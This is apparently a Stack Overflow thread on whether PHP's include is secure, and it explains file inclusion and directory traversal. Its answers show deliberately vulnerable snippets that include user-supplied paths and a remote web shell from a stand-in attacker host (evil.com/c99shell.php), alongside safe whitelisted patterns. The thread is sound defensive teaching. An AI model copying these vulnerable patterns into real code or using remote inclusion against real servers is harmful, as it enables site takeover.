PHP - Is "include" function secure?

Question

I'm using the "include" function (e.x. "include 'header2.php'" or "include 'class.users.php'") to add the header or session class in my website. I don't really remember where, but I heard that hackers abuse, somehow, this "include" thing, sending the fake included page or something like that. So basically I would like to know what's with that "include" function, how can I protect it, how do they abuse it and if there are better solutions for what I am looking for.

Thanks in advance.

If a person has access to your PHP code, they are in your server. There is no point in securing something that's already compromised. Instead, focus on closing up the entry points by, for example, fixing all of your application's SQL injection vulnerabilities. — Blender, Apr 13 '12 at 21:10
The point is, I heard that the 'include "something.php"' is insecure or hackable, as well as SQL injections. Is it true? — user1327735, Apr 13 '12 at 21:12
Anything is exploitable if you use it incorrectly. As long as you are `include`ing static PHP files, you really have nothing to worry about in that area. — Blender, Apr 13 '12 at 22:41

Lawrence Cherone · Accepted Answer · 2015-11-21T18:47:23.153

It all depends on how you implement it. If you specifically set the path, then it's secure. The attack could happen if you allow user input to determine the file path without sanitization or checks.

Insecure (Directory Traversal)

<?php 
include($_GET['file']);
?>

Insecure (URL fopen - If enabled)

<?php 
include('http://evil.com/c99shell.php');
?>

Insecure

<?php 
include('./some_dir/' . $_GET['file']);
?>

Partially Insecure ( *.php files are vulnerable )

<?php 
include('./some_dir/' . $_GET['file'] . '.php');
?>

Secure (Though not sure why anyone would do this.)

<?php 
$allowed = array(
    'somefile.php',
    'someotherfile.php'
);

if (in_array(basename($_GET['file']), $allowed)) {
    include('./includes/' . basename($_GET['file']));
}
?>

Secure

<?php 
include('./includes/somefile.php');
?>

score 4 · Answer 2 · answered Apr 13 '12 at 21:13

The biggest issue with includes is likely changing filename extension from PHP to something that doesn't get automatically executed by the web server. For example- library.inc, or config.inc. Invoking these files with a web browser will reveal the code instead of executing it - and any passwords or exploitable hints will be shown.

Compare config.php that might have a password in it with config.inc. Pulling up config.inc would in most cases show what the database password was.

There are programmers who use .inc extensions for libraries. The premise is that they won't be in a directory accessible by a web server. However, less security paranoid programmers might dump that file into a convenient web directory.

Otherwise, ensure that you don't include a file that's submitted by a query string somehow. Ex: include( $_GET['menu_file'] ) <-- this is very wrong.

+1 Nice note about file extensions that can be included as code, but when loaded separately in the browser will expose your code. — DampeS8N, Apr 13 '12 at 21:21
What do you mean by "invoking these files with a web browser"? Say you have a server with public name "example.com". (1) If someone knows there's a file in the root directory called "a.inc", can they just look at it with "`http://example.com/a.inc`"? (2) If they don't know what .inc files exist in a given directory, how would they find out? — Alan, Mar 27 '14 at 20:26

score 3 · Answer 3 · answered Apr 13 '12 at 21:12

Include can be abused if you do something like this:

include($_GET["page"]);

and then call the URL:

myscript.php?page=index.php

attackers can then substitute index.php for hxxp://hackerz.ru/install_stuff.php and your server will gladly run it.

include itself is perfectly safe. Just make sure to always validate/escape your input.

score 3 · Answer 4 · edited Nov 11 '22 at 04:26

3

Anything server side (assuming your server isn't compromised) is safe. Doing this:

Insecure

$var = $_GET['var']';    
include $var . ".php";

Secure

include "page.php";

edited Nov 11 '22 at 04:26

Dexter

7,911
4
41
40

answered Apr 13 '12 at 21:13

Blake

2,294
1
16
24

1

Note: Assuming `page.php` is secure. ;) – Mr. Llama Apr 13 '12 at 21:15
1

Sure, provided the referenced file is trusted and secure. – Blake Apr 13 '12 at 21:17

DampeS8N · Answer 5 · 2012-04-13T21:26:43.403

Include is safe provided you don't:

Include a remote file like www.someoneelsesssite.com/something.php
Include a file from a path that came from the client. www.mysite.com/bad.php?path=oops/here/is/your/passwords/file
Include a file from another possibly tainted source like a database.

2 and 3 technically have the caveat that if you disallow . or / or on windows \ you are probably fine. But if you don't know why, you don't know enough about it to risk it. Even when you think the database is read only or otherwise secure, it is wise to not assume that unless you really have to, which is almost never.

As pp19dd's answer points out. It is also vital that you name your includes with the .php extension. If you've set apache (or whatever web server you are using) to parse another file type as PHP too, that's safe as well. But if you don't know for sure, use .php exclusively.

@FritsvanCampen agreed, but as a general rule I try to answer these from the standpoint that anyone who needs to be asking this, isn't ready to take risks of any sort. If any part of your code is 'magic' you shouldn't take risks. (by magic, I mean it works based on a mechanic you don't understand) — DampeS8N, Apr 13 '12 at 21:18

score 0 · Answer 6 · answered Apr 13 '12 at 21:12

0

The best thing to do is ensure that the page you are trying to include exists first. The real security loopholes come when your include page is processed from some sort of user input, such as a URL variable. ?include=page.php As long as you are cautious of these you should be fine.

if(is_file($file)) {
    //other code, such as user verification and such should also go here
    include $file;
}
else { die(); }

answered Apr 13 '12 at 21:12

mseancole

1,662
4
16
26

This will not protect you against anything. Your passwords file is a file, php.ini is a file, all the things attackers would find, are files. – DampeS8N Apr 13 '12 at 21:20
@DampeS8N: I was not trying to imply that this was the only thing to do, only that it was a step in the process. I also included a comment about inserting other code, "user verification and such". User verification helps ensure that no "member" sensitive pages are accessed. The other code could be a file blacklist. I do not know why you downvoted my answer when your answer was just as vague. – mseancole Apr 13 '12 at 21:31
People who don't know how to secure against Directory Traversal attacks shouldn't attempt to include files dynamically under any conditions. Your answer suggests the 'best' thing you can do is ensure the file exists. The relevant security information isn't vague, it is absent. I did not downvote you to hurt you, and I will undownvote if you add the needed information. And remove your downvote of my answer or leave a comment as to what you think is vague. – DampeS8N Apr 13 '12 at 21:34

score -2 · Answer 7 · answered Jul 02 '15 at 17:48

-2

I'm using this method.

<?php include (dirname(__FILE__).'/file.php');

answered Jul 02 '15 at 17:48

husnixs

37
3

I hope that works for you but in sake of a better answer you can actually **explain** why this works – jean Jul 02 '15 at 18:14

PHP - Is "include" function secure?

7 Answers7

Insecure

Secure

Linked

Related